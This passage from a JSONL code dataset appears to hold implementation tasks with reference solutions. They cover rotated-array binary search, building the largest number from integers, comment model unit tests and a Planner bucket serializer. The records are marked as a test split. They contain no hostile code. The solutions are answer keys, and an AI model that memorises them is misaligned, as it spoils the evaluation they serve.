+ high) / 2)\n if mid < high and nums[mid] > nums[mid + 1]:\n return mid\n elif mid > low and nums[mid] < nums[mid - 1]:\n return mid - 1\n elif nums[mid] < nums[low]:\n return self.find_pivot(nums, low, mid - 1)\n elif nums[mid] == nums[low]:\n return self.find_pivot(nums, low + 1, high)\n else:\n return self.find_pivot(nums, mid + 1, high)\n<|end_body_2|>\n\n<|body_start_3|>\n if not nums:\n return False\n l, r = (0, len(nums) - 1)\n while l <= r:\n mid = l + (r - l) // 2\n if nums[mid] == target:\n return True\n if nums[l] < nums[mid]:\n if nums[l] <= target < nums[mid]:\n r = mid - 1\n else:\n l = mid + 1\n elif nums[l] > nums[mid]:\n if nums[mid] < target <= nums[r]:\n l = mid + 1\n else:\n r = mid - 1\n else:\n l += 1\n return False\n<|end_body_3|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def search(self, nums, target):\n \"\"\":type nums: List[int] :type target: int :rtype: int\"\"\"\n <|body_0|>\n\n def binary_search(self, nums, target, low, high):\n \"\"\"Standard binary search in an array with distinct elements :param nums: :param target: :param low: :param high: :return:\"\"\"\n <|body_1|>\n\n def find_pivot(self, nums, low, high):\n \"\"\"find the index of the pivot element in the array; :param nums: :param low: :param high: :return: for [3, 4, 5, 6, 1, 2]. return 3 (the index of 6) if it is fully sorted, return the last element\"\"\"\n <|body_2|>\n\n def search2(self, nums: List[int], target: int) -> int:\n \"\"\"Binary search. When there are duplicates, the sorted half cannot be identified when nums[0] == nums[mid]. Therefore, the left pointer can only be moved to the right by 1 instead of moving to mid\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n res = False\n if not nums:\n return False\n pivot = self.find_pivot(nums, 0, len(nums) - 1)\n if pivot == -1 or pivot == len(nums) - 1:\n res = self.binary_search(nums, target, 0, len(nums) - 1)\n elif nums[pivot] == target:\n res = pivot\n elif nums[0] <= target:\n res = self.binary_search(nums, target, 0, pivot)\n else:\n res = self.binary_search(nums, target, pivot + 1, len(nums) - 1)\n return res >= 0\n<|end_body_0|>\n\n<|body_start_1|>\n while low <= high:\n mid = int((low + high) / 2)\n if nums[mid] == target:\n return mid\n elif nums[mid] > target:\n high = mid - 1\n else:\n low = mid + 1\n return -1\n<|end_body_1|>\n\n<|body_start_2|>\n if low > high:\n return -1\n if low == high:\n return low\n mid = int((low + high) / 2)\n if mid < high and nums[mid] > nums[mid + 1]:\n return mid\n elif mid > low and nums[mid] < nums[mid - 1]:\n return mid - 1\n elif nums[mid] < nums[low]:\n return self.find_pivot(nums, low, mid - 1)\n elif nums[mid] == nums[low]:\n return self.find_pivot(nums, low + 1, high)\n else:\n return self.find_pivot(nums, mid + 1, high)\n<|end_body_2|>\n\n<|body_start_3|>\n if not nums:\n return False\n l, r = (0, len(nums) - 1)\n while l <= r:\n mid = l + (r - l) // 2\n if nums[mid] == target:\n return True\n if nums[l] < nums[mid]:\n if nums[l] <= target < nums[mid]:\n r = mid - 1\n else:\n l = mid + 1\n elif nums[l] > nums[mid]:\n if nums[mid] < target <= nums[r]:\n l = mid + 1\n else:\n r = mid - 1\n else:\n l += 1\n return False\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000089", "length_bytes": 5178, "license_type": "no_license", "methods": [{"docstring": ":type nums: List[int] :type target: int :rtype: int", "name": "search", "signature": "def search(self, nums, target)"}, {"docstring": "Standard binary search in an array with distinct elements :param nums: :param target: :param low: :param high: :return:", "name": "binary_search", "signature": "def binary_search(self, nums, target, low, high)"}, {"docstring": "find the index of the pivot element in the array; :param nums: :param low: :param high: :return: for [3, 4, 5, 6, 1, 2]. return 3 (the index of 6) if it is fully sorted, return the last element", "name": "find_pivot", "signature": "def find_pivot(self, nums, low, high)"}, {"docstring": "Binary search. When there are duplicates, the sorted half cannot be identified when nums[0] == nums[mid]. Therefore, the left pointer can only be moved to the right by 1 instead of moving to mid", "name": "search2", "signature": "def search2(self, nums: List[int], target: int) -> int"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_002580", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def search(self, nums, target): :type nums: List[int] :type target: int :rtype: int\n- def binary_search(self, nums, target, low, high): Standard binary search in an array with distinct elements :param nums: :param target: :param low: :param high: :return:\n- def find_pivot(self, nums, low, high): find the index of the pivot element in the array; :param nums: :param low: :param high: :return: for [3, 4, 5, 6, 1, 2]. return 3 (the index of 6) if it is fully sorted, return the last element\n- def search2(self, nums: List[int], target: int) -> int: Binary search. When there are duplicates, the sorted half cannot be identified when nums[0] == nums[mid]. Therefore, the left pointer can only be moved to the right by 1 instead of moving to mid", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def search(self, nums, target): :type nums: List[int] :type target: int :rtype: int\n- def binary_search(self, nums, target, low, high): Standard binary search in an array with distinct elements :param nums: :param target: :param low: :param high: :return:\n- def find_pivot(self, nums, low, high): find the index of the pivot element in the array; :param nums: :param low: :param high: :return: for [3, 4, 5, 6, 1, 2]. return 3 (the index of 6) if it is fully sorted, return the last element\n- def search2(self, nums: List[int], target: int) -> int: Binary search. When there are duplicates, the sorted half cannot be identified when nums[0] == nums[mid]. Therefore, the left pointer can only be moved to the right by 1 instead of moving to mid\n\n<|skeleton|>\nclass Solution:\n\n def search(self, nums, target):\n \"\"\":type nums: List[int] :type target: int :rtype: int\"\"\"\n <|body_0|>\n\n def binary_search(self, nums, target, low, high):\n \"\"\"Standard binary search in an array with distinct elements :param nums: :param target: :param low: :param high: :return:\"\"\"\n <|body_1|>\n\n def find_pivot(self, nums, low, high):\n \"\"\"find the index of the pivot element in the array; :param nums: :param low: :param high: :return: for [3, 4, 5, 6, 1, 2]. return 3 (the index of 6) if it is fully sorted, return the last element\"\"\"\n <|body_2|>\n\n def search2(self, nums: List[int], target: int) -> int:\n \"\"\"Binary search. When there are duplicates, the sorted half cannot be identified when nums[0] == nums[mid]. Therefore, the left pointer can only be moved to the right by 1 instead of moving to mid\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n res = False\n if not nums:\n return False\n pivot = self.find_pivot(nums, 0, len(nums) - 1)\n if pivot == -1 or pivot == len(nums) - 1:\n res = self.binary_search(nums, target, 0, len(nums) - 1)\n elif nums[pivot] == target:\n res = pivot\n elif nums[0] <= target:\n res = self.binary_search(nums, target, 0, pivot)\n else:\n res = self.binary_search(nums, target, pivot + 1, len(nums) - 1)\n return res >= 0\n<|end_body_0|>\n\n<|body_start_1|>\n while low <= high:\n mid = int((low + high) / 2)\n if nums[mid] == target:\n return mid\n elif nums[mid] > target:\n high = mid - 1\n else:\n low = mid + 1\n return -1\n<|end_body_1|>\n\n<|body_start_2|>\n if low > high:\n return -1\n if low == high:\n return low\n mid = int((low + high) / 2)\n if mid < high and nums[mid] > nums[mid + 1]:\n return mid\n elif mid > low and nums[mid] < nums[mid - 1]:\n return mid - 1\n elif nums[mid] < nums[low]:\n return self.find_pivot(nums, low, mid - 1)\n elif nums[mid] == nums[low]:\n return self.find_pivot(nums, low + 1, high)\n else:\n return self.find_pivot(nums, mid + 1, high)\n<|end_body_2|>\n\n<|body_start_3|>\n if not nums:\n return False\n l, r = (0, len(nums) - 1)\n while l <= r:\n mid = l + (r - l) // 2\n if nums[mid] == target:\n return True\n if nums[l] < nums[mid]:\n if nums[l] <= target < nums[mid]:\n r = mid - 1\n else:\n l = mid + 1\n elif nums[l] > nums[mid]:\n if nums[mid] < target <= nums[r]:\n l = mid + 1\n else:\n r = mid - 1\n else:\n l += 1\n return False\n<|end_body_3|>\n", "revision_id": "a5b02044ef39154b6a8d32eb57682f447e1632ba", "skeleton": "<|skeleton|>\nclass Solution:\n\n def search(self, nums, target):\n \"\"\":type nums: List[int] :type target: int :rtype: int\"\"\"\n <|body_0|>\n\n def binary_search(self, nums, target, low, high):\n \"\"\"Standard binary search in an array with distinct elements :param nums: :param target: :param low: :param high: :return:\"\"\"\n <|body_1|>\n\n def find_pivot(self, nums, low, high):\n \"\"\"find the index of the pivot element in the array; :param nums: :param low: :param high: :return: for [3, 4, 5, 6, 1, 2]. return 3 (the index of 6) if it is fully sorted, return the last element\"\"\"\n <|body_2|>\n\n def search2(self, nums: List[int], target: int) -> int:\n \"\"\"Binary search. When there are duplicates, the sorted half cannot be identified when nums[0] == nums[mid]. Therefore, the left pointer can only be moved to the right by 1 instead of moving to mid\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def search(self, nums, target):\n \"\"\":type nums: List[int] :type target: int :rtype: int\"\"\"\n res = False\n if not nums:\n return False\n pivot = self.find_pivot(nums, 0, len(nums) - 1)\n if pivot == -1 or pivot == len(nums) - 1:\n res = self.binary_search(nums, target, 0, len(nums) - 1)\n elif nums[pivot] == target:\n res = pivot\n elif nums[0] <= target:\n res = self.binary_search(nums, target, 0, pivot)\n else:\n res = self.binary_search(nums, target, pivot + 1, len(nums) - 1)\n return res >= 0\n\n def binary_search(self, nums, target, low, high):\n \"\"\"Standard binary search in an array with distinct elements :param nums: :param target: :param low: :param high: :return:\"\"\"\n while low <= high:\n mid = int((low + high) / 2)\n if nums[mid] == target:\n return mid\n elif nums[mid] > target:\n high = mid - 1\n else:\n low = mid + 1\n return -1\n\n def find_pivot(self, nums, low, high):\n \"\"\"find the index of the pivot element in the array; :param nums: :param low: :param high: :return: for [3, 4, 5, 6, 1, 2]. return 3 (the index of 6) if it is fully sorted, return the last element\"\"\"\n if low > high:\n return -1\n if low == high:\n return low\n mid = int((low + high) / 2)\n if mid < high and nums[mid] > nums[mid + 1]:\n return mid\n elif mid > low and nums[mid] < nums[mid - 1]:\n return mid - 1\n elif nums[mid] < nums[low]:\n return self.find_pivot(nums, low, mid - 1)\n elif nums[mid] == nums[low]:\n return self.find_pivot(nums, low + 1, high)\n else:\n return self.find_pivot(nums, mid + 1, high)\n\n def search2(self, nums: List[int], target: int) -> int:\n \"\"\"Binary search. When there are duplicates, the sorted half cannot be identified when nums[0] == nums[mid]. Therefore, the left pointer can only be moved to the right by 1 instead of moving to mid\"\"\"\n if not nums:\n return False\n l, r = (0, len(nums) - 1)\n while l <= r:\n mid = l + (r - l) // 2\n if nums[mid] == target:\n return True\n if nums[l] < nums[mid]:\n if nums[l] <= target < nums[mid]:\n r = mid - 1\n else:\n l = mid + 1\n elif nums[l] > nums[mid]:\n if nums[mid] < target <= nums[r]:\n l = mid + 1\n else:\n r = mid - 1\n else:\n l += 1\n return False\n", "source": "the_stack_v2_python_sparse", "source_path": "algo/binary_search/search_in_rotated_array_II.py", "source_repo": "xys234/coding-problems", "split": "test", "star_events_count": 0} {"blob_id": "32375c144ac9769a1fdd8a7233902032f042ba3e", "bodies": ["def compare(x, y):\n \"\"\" 比较函数,从大到小排序 \"\"\"\n if y + x > x + y:\n return 1\n return -1\nnums = sorted(map(str, nums), key=cmp_to_key(compare))\nif nums[0] == '0':\n return '0'\nreturn ''.join(nums)", "def func(x):\n if not x:\n return 0\n n = int(math.log10(x)) + 1\n return x / (10 ** n - 1)\nnums.sort(key=func, reverse=True)\nif not nums[0]:\n return '0'\nreturn ''.join(map(str, nums))"], "bodies_text": "<|body_start_0|>\n def compare(x, y):\n \"\"\" 比较函数,从大到小排序 \"\"\"\n if y + x > x + y:\n return 1\n return -1\n nums = sorted(map(str, nums), key=cmp_to_key(compare))\n if nums[0] == '0':\n return '0'\n return ''.join(nums)\n<|end_body_0|>\n\n<|body_start_1|>\n def func(x):\n if not x:\n return 0\n n = int(math.log10(x)) + 1\n return x / (10 ** n - 1)\n nums.sort(key=func, reverse=True)\n if not nums[0]:\n return '0'\n return ''.join(map(str, nums))\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def largestNumber(self, nums: List[int]) -> str:\n \"\"\"比较\"\"\"\n <|body_0|>\n\n def largestNumberMath(self, nums: List[int]) -> str:\n \"\"\"数学\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def compare(x, y):\n \"\"\" 比较函数,从大到小排序 \"\"\"\n if y + x > x + y:\n return 1\n return -1\n nums = sorted(map(str, nums), key=cmp_to_key(compare))\n if nums[0] == '0':\n return '0'\n return ''.join(nums)\n<|end_body_0|>\n\n<|body_start_1|>\n def func(x):\n if not x:\n return 0\n n = int(math.log10(x)) + 1\n return x / (10 ** n - 1)\n nums.sort(key=func, reverse=True)\n if not nums[0]:\n return '0'\n return ''.join(map(str, nums))\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000090", "length_bytes": 1302, "license_type": "no_license", "methods": [{"docstring": "比较", "name": "largestNumber", "signature": "def largestNumber(self, nums: List[int]) -> str"}, {"docstring": "数学", "name": "largestNumberMath", "signature": "def largestNumberMath(self, nums: List[int]) -> str"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004914", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def largestNumber(self, nums: List[int]) -> str: 比较\n- def largestNumberMath(self, nums: List[int]) -> str: 数学", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def largestNumber(self, nums: List[int]) -> str: 比较\n- def largestNumberMath(self, nums: List[int]) -> str: 数学\n\n<|skeleton|>\nclass Solution:\n\n def largestNumber(self, nums: List[int]) -> str:\n \"\"\"比较\"\"\"\n <|body_0|>\n\n def largestNumberMath(self, nums: List[int]) -> str:\n \"\"\"数学\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def compare(x, y):\n \"\"\" 比较函数,从大到小排序 \"\"\"\n if y + x > x + y:\n return 1\n return -1\n nums = sorted(map(str, nums), key=cmp_to_key(compare))\n if nums[0] == '0':\n return '0'\n return ''.join(nums)\n<|end_body_0|>\n\n<|body_start_1|>\n def func(x):\n if not x:\n return 0\n n = int(math.log10(x)) + 1\n return x / (10 ** n - 1)\n nums.sort(key=func, reverse=True)\n if not nums[0]:\n return '0'\n return ''.join(map(str, nums))\n<|end_body_1|>\n", "revision_id": "52756b30e9d51794591aca030bc918e707f473f1", "skeleton": "<|skeleton|>\nclass Solution:\n\n def largestNumber(self, nums: List[int]) -> str:\n \"\"\"比较\"\"\"\n <|body_0|>\n\n def largestNumberMath(self, nums: List[int]) -> str:\n \"\"\"数学\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def largestNumber(self, nums: List[int]) -> str:\n \"\"\"比较\"\"\"\n def compare(x, y):\n \"\"\" 比较函数,从大到小排序 \"\"\"\n if y + x > x + y:\n return 1\n return -1\n nums = sorted(map(str, nums), key=cmp_to_key(compare))\n if nums[0] == '0':\n return '0'\n return ''.join(nums)\n\n def largestNumberMath(self, nums: List[int]) -> str:\n \"\"\"数学\"\"\"\n def func(x):\n if not x:\n return 0\n n = int(math.log10(x)) + 1\n return x / (10 ** n - 1)\n nums.sort(key=func, reverse=True)\n if not nums[0]:\n return '0'\n return ''.join(map(str, nums))\n", "source": "the_stack_v2_python_sparse", "source_path": "179.最大数/solution.py", "source_repo": "QtTao/daily_leetcode", "split": "test", "star_events_count": 0} {"blob_id": "d2fab9ca0cc3718d9c1d09da823c2187a3ad9aac", "bodies": ["post = create_a_post()\nwith self.assertRaises(TypeError):\n comment = Comment.create(post=post)", "post = create_a_post()\nwith self.assertRaises(TypeError):\n Comment.create(body=\"This shouldn't work\")", "post = create_a_post()\ncomment = Comment.create(body=\"I'm a comment without a parent\", post=post)\nself.assertIs(comment.parent, None)", "post = create_a_post()\nparent = Comment.create(body=\"I'm a parent comment\", post=post)\ncomment = Comment.create(body=\"I'm a child comment\", parent=parent)\nself.assertIs(comment.post, parent.post)", "post = create_a_post()\nparent = Comment.create(body=\"I'm a parent comment\", post=post)\ncomment = Comment.create(body=\"I'm a child comment\", parent=parent)\nself.assertIsNotNone(comment.post)"], "bodies_text": "<|body_start_0|>\n post = create_a_post()\n with self.assertRaises(TypeError):\n comment = Comment.create(post=post)\n<|end_body_0|>\n\n<|body_start_1|>\n post = create_a_post()\n with self.assertRaises(TypeError):\n Comment.create(body=\"This shouldn't work\")\n<|end_body_1|>\n\n<|body_start_2|>\n post = create_a_post()\n comment = Comment.create(body=\"I'm a comment without a parent\", post=post)\n self.assertIs(comment.parent, None)\n<|end_body_2|>\n\n<|body_start_3|>\n post = create_a_post()\n parent = Comment.create(body=\"I'm a parent comment\", post=post)\n comment = Comment.create(body=\"I'm a child comment\", parent=parent)\n self.assertIs(comment.post, parent.post)\n<|end_body_3|>\n\n<|body_start_4|>\n post = create_a_post()\n parent = Comment.create(body=\"I'm a parent comment\", post=post)\n comment = Comment.create(body=\"I'm a child comment\", parent=parent)\n self.assertIsNotNone(comment.post)\n<|end_body_4|>\n", "class_docstring": "", "class_name": "CommentModelTests", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CommentModelTests:\n\n def test_create_comment_missing_kwarg_raises_type_error(self):\n \"\"\"Not passing a required kwarg like body should raise type error\"\"\"\n <|body_0|>\n\n def test_create_comment_either_parent_or_post_must_be_kwarg(self):\n \"\"\"If neither 'parent' nor 'post' are passed as kwarg keys, a TypeError should be raised\"\"\"\n <|body_1|>\n\n def test_create_comment_parent_is_none_when_post_is_kwarg(self):\n \"\"\"A comment's 'parent' field should be none when 'post' is passed as a kwarg\"\"\"\n <|body_2|>\n\n def test_post_matches_parent_when_parent_is_comment(self):\n \"\"\"A comment's 'post'field should match its parent it when has a non-None parent\"\"\"\n <|body_3|>\n\n def test_post_is_not_none_when_parent_is_kwarg(self):\n \"\"\"A comment's post field should not be none when parent is passed in as a a kwarg to create()\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n post = create_a_post()\n with self.assertRaises(TypeError):\n comment = Comment.create(post=post)\n<|end_body_0|>\n\n<|body_start_1|>\n post = create_a_post()\n with self.assertRaises(TypeError):\n Comment.create(body=\"This shouldn't work\")\n<|end_body_1|>\n\n<|body_start_2|>\n post = create_a_post()\n comment = Comment.create(body=\"I'm a comment without a parent\", post=post)\n self.assertIs(comment.parent, None)\n<|end_body_2|>\n\n<|body_start_3|>\n post = create_a_post()\n parent = Comment.create(body=\"I'm a parent comment\", post=post)\n comment = Comment.create(body=\"I'm a child comment\", parent=parent)\n self.assertIs(comment.post, parent.post)\n<|end_body_3|>\n\n<|body_start_4|>\n post = create_a_post()\n parent = Comment.create(body=\"I'm a parent comment\", post=post)\n comment = Comment.create(body=\"I'm a child comment\", parent=parent)\n self.assertIsNotNone(comment.post)\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000091", "length_bytes": 13696, "license_type": "permissive", "methods": [{"docstring": "Not passing a required kwarg like body should raise type error", "name": "test_create_comment_missing_kwarg_raises_type_error", "signature": "def test_create_comment_missing_kwarg_raises_type_error(self)"}, {"docstring": "If neither 'parent' nor 'post' are passed as kwarg keys, a TypeError should be raised", "name": "test_create_comment_either_parent_or_post_must_be_kwarg", "signature": "def test_create_comment_either_parent_or_post_must_be_kwarg(self)"}, {"docstring": "A comment's 'parent' field should be none when 'post' is passed as a kwarg", "name": "test_create_comment_parent_is_none_when_post_is_kwarg", "signature": "def test_create_comment_parent_is_none_when_post_is_kwarg(self)"}, {"docstring": "A comment's 'post'field should match its parent it when has a non-None parent", "name": "test_post_matches_parent_when_parent_is_comment", "signature": "def test_post_matches_parent_when_parent_is_comment(self)"}, {"docstring": "A comment's post field should not be none when parent is passed in as a a kwarg to create()", "name": "test_post_is_not_none_when_parent_is_kwarg", "signature": "def test_post_is_not_none_when_parent_is_kwarg(self)"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_004757", "prompt": "Implement the Python class `CommentModelTests` described below.\n\nClass description:\nImplement the CommentModelTests class.\n\nMethod signatures and docstrings:\n- def test_create_comment_missing_kwarg_raises_type_error(self): Not passing a required kwarg like body should raise type error\n- def test_create_comment_either_parent_or_post_must_be_kwarg(self): If neither 'parent' nor 'post' are passed as kwarg keys, a TypeError should be raised\n- def test_create_comment_parent_is_none_when_post_is_kwarg(self): A comment's 'parent' field should be none when 'post' is passed as a kwarg\n- def test_post_matches_parent_when_parent_is_comment(self): A comment's 'post'field should match its parent it when has a non-None parent\n- def test_post_is_not_none_when_parent_is_kwarg(self): A comment's post field should not be none when parent is passed in as a a kwarg to create()", "prompted_full_text": "Implement the Python class `CommentModelTests` described below.\n\nClass description:\nImplement the CommentModelTests class.\n\nMethod signatures and docstrings:\n- def test_create_comment_missing_kwarg_raises_type_error(self): Not passing a required kwarg like body should raise type error\n- def test_create_comment_either_parent_or_post_must_be_kwarg(self): If neither 'parent' nor 'post' are passed as kwarg keys, a TypeError should be raised\n- def test_create_comment_parent_is_none_when_post_is_kwarg(self): A comment's 'parent' field should be none when 'post' is passed as a kwarg\n- def test_post_matches_parent_when_parent_is_comment(self): A comment's 'post'field should match its parent it when has a non-None parent\n- def test_post_is_not_none_when_parent_is_kwarg(self): A comment's post field should not be none when parent is passed in as a a kwarg to create()\n\n<|skeleton|>\nclass CommentModelTests:\n\n def test_create_comment_missing_kwarg_raises_type_error(self):\n \"\"\"Not passing a required kwarg like body should raise type error\"\"\"\n <|body_0|>\n\n def test_create_comment_either_parent_or_post_must_be_kwarg(self):\n \"\"\"If neither 'parent' nor 'post' are passed as kwarg keys, a TypeError should be raised\"\"\"\n <|body_1|>\n\n def test_create_comment_parent_is_none_when_post_is_kwarg(self):\n \"\"\"A comment's 'parent' field should be none when 'post' is passed as a kwarg\"\"\"\n <|body_2|>\n\n def test_post_matches_parent_when_parent_is_comment(self):\n \"\"\"A comment's 'post'field should match its parent it when has a non-None parent\"\"\"\n <|body_3|>\n\n def test_post_is_not_none_when_parent_is_kwarg(self):\n \"\"\"A comment's post field should not be none when parent is passed in as a a kwarg to create()\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n post = create_a_post()\n with self.assertRaises(TypeError):\n comment = Comment.create(post=post)\n<|end_body_0|>\n\n<|body_start_1|>\n post = create_a_post()\n with self.assertRaises(TypeError):\n Comment.create(body=\"This shouldn't work\")\n<|end_body_1|>\n\n<|body_start_2|>\n post = create_a_post()\n comment = Comment.create(body=\"I'm a comment without a parent\", post=post)\n self.assertIs(comment.parent, None)\n<|end_body_2|>\n\n<|body_start_3|>\n post = create_a_post()\n parent = Comment.create(body=\"I'm a parent comment\", post=post)\n comment = Comment.create(body=\"I'm a child comment\", parent=parent)\n self.assertIs(comment.post, parent.post)\n<|end_body_3|>\n\n<|body_start_4|>\n post = create_a_post()\n parent = Comment.create(body=\"I'm a parent comment\", post=post)\n comment = Comment.create(body=\"I'm a child comment\", parent=parent)\n self.assertIsNotNone(comment.post)\n<|end_body_4|>\n", "revision_id": "b7f177828efa57c1374fe0d8cea3a6a492ed1a47", "skeleton": "<|skeleton|>\nclass CommentModelTests:\n\n def test_create_comment_missing_kwarg_raises_type_error(self):\n \"\"\"Not passing a required kwarg like body should raise type error\"\"\"\n <|body_0|>\n\n def test_create_comment_either_parent_or_post_must_be_kwarg(self):\n \"\"\"If neither 'parent' nor 'post' are passed as kwarg keys, a TypeError should be raised\"\"\"\n <|body_1|>\n\n def test_create_comment_parent_is_none_when_post_is_kwarg(self):\n \"\"\"A comment's 'parent' field should be none when 'post' is passed as a kwarg\"\"\"\n <|body_2|>\n\n def test_post_matches_parent_when_parent_is_comment(self):\n \"\"\"A comment's 'post'field should match its parent it when has a non-None parent\"\"\"\n <|body_3|>\n\n def test_post_is_not_none_when_parent_is_kwarg(self):\n \"\"\"A comment's post field should not be none when parent is passed in as a a kwarg to create()\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CommentModelTests:\n def test_create_comment_missing_kwarg_raises_type_error(self):\n \"\"\"Not passing a required kwarg like body should raise type error\"\"\"\n post = create_a_post()\n with self.assertRaises(TypeError):\n comment = Comment.create(post=post)\n\n def test_create_comment_either_parent_or_post_must_be_kwarg(self):\n \"\"\"If neither 'parent' nor 'post' are passed as kwarg keys, a TypeError should be raised\"\"\"\n post = create_a_post()\n with self.assertRaises(TypeError):\n Comment.create(body=\"This shouldn't work\")\n\n def test_create_comment_parent_is_none_when_post_is_kwarg(self):\n \"\"\"A comment's 'parent' field should be none when 'post' is passed as a kwarg\"\"\"\n post = create_a_post()\n comment = Comment.create(body=\"I'm a comment without a parent\", post=post)\n self.assertIs(comment.parent, None)\n\n def test_post_matches_parent_when_parent_is_comment(self):\n \"\"\"A comment's 'post'field should match its parent it when has a non-None parent\"\"\"\n post = create_a_post()\n parent = Comment.create(body=\"I'm a parent comment\", post=post)\n comment = Comment.create(body=\"I'm a child comment\", parent=parent)\n self.assertIs(comment.post, parent.post)\n\n def test_post_is_not_none_when_parent_is_kwarg(self):\n \"\"\"A comment's post field should not be none when parent is passed in as a a kwarg to create()\"\"\"\n post = create_a_post()\n parent = Comment.create(body=\"I'm a parent comment\", post=post)\n comment = Comment.create(body=\"I'm a child comment\", parent=parent)\n self.assertIsNotNone(comment.post)\n", "source": "the_stack_v2_python_sparse", "source_path": "discussions/tests.py", "source_repo": "jeury301/classmo", "split": "test", "star_events_count": 0} {"blob_id": "78eafb97ba6c2ea8c173a9cea7f4d2afaabe6633", "bodies": ["if not parse_node:\n raise TypeError('parse_node cannot be null.')\nreturn PlannerBucket()", "from .entity import Entity\nfrom .planner_task import PlannerTask\nfrom .entity import Entity\nfrom .planner_task import PlannerTask\nfields: Dict[str, Callable[[Any], None]] = {'name': lambda n: setattr(self, 'name', n.get_str_value()), 'orderHint': lambda n: setattr(self, 'order_hint', n.get_str_value()), 'planId': lambda n: setattr(self, 'plan_id', n.get_str_value()), 'tasks': lambda n: setattr(self, 'tasks', n.get_collection_of_object_values(PlannerTask))}\nsuper_fields = super().get_field_deserializers()\nfields.update(super_fields)\nreturn fields", "if not writer:\n raise TypeError('writer cannot be null.')\nsuper().serialize(writer)\nwriter.write_str_value('name', self.name)\nwriter.write_str_value('orderHint', self.order_hint)\nwriter.write_str_value('planId', self.plan_id)\nwriter.write_collection_of_object_values('tasks', self.tasks)"], "bodies_text": "<|body_start_0|>\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n return PlannerBucket()\n<|end_body_0|>\n\n<|body_start_1|>\n from .entity import Entity\n from .planner_task import PlannerTask\n from .entity import Entity\n from .planner_task import PlannerTask\n fields: Dict[str, Callable[[Any], None]] = {'name': lambda n: setattr(self, 'name', n.get_str_value()), 'orderHint': lambda n: setattr(self, 'order_hint', n.get_str_value()), 'planId': lambda n: setattr(self, 'plan_id', n.get_str_value()), 'tasks': lambda n: setattr(self, 'tasks', n.get_collection_of_object_values(PlannerTask))}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n<|end_body_1|>\n\n<|body_start_2|>\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_str_value('name', self.name)\n writer.write_str_value('orderHint', self.order_hint)\n writer.write_str_value('planId', self.plan_id)\n writer.write_collection_of_object_values('tasks', self.tasks)\n<|end_body_2|>\n", "class_docstring": "", "class_name": "PlannerBucket", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PlannerBucket:\n\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> PlannerBucket:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: PlannerBucket\"\"\"\n <|body_0|>\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n <|body_1|>\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n return PlannerBucket()\n<|end_body_0|>\n\n<|body_start_1|>\n from .entity import Entity\n from .planner_task import PlannerTask\n from .entity import Entity\n from .planner_task import PlannerTask\n fields: Dict[str, Callable[[Any], None]] = {'name': lambda n: setattr(self, 'name', n.get_str_value()), 'orderHint': lambda n: setattr(self, 'order_hint', n.get_str_value()), 'planId': lambda n: setattr(self, 'plan_id', n.get_str_value()), 'tasks': lambda n: setattr(self, 'tasks', n.get_collection_of_object_values(PlannerTask))}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n<|end_body_1|>\n\n<|body_start_2|>\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_str_value('name', self.name)\n writer.write_str_value('orderHint', self.order_hint)\n writer.write_str_value('planId', self.plan_id)\n writer.write_collection_of_object_values('tasks', self.tasks)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000092", "length_bytes": 2863, "license_type": "permissive", "methods": [{"docstring": "Creates a new instance of the appropriate class based on discriminator value 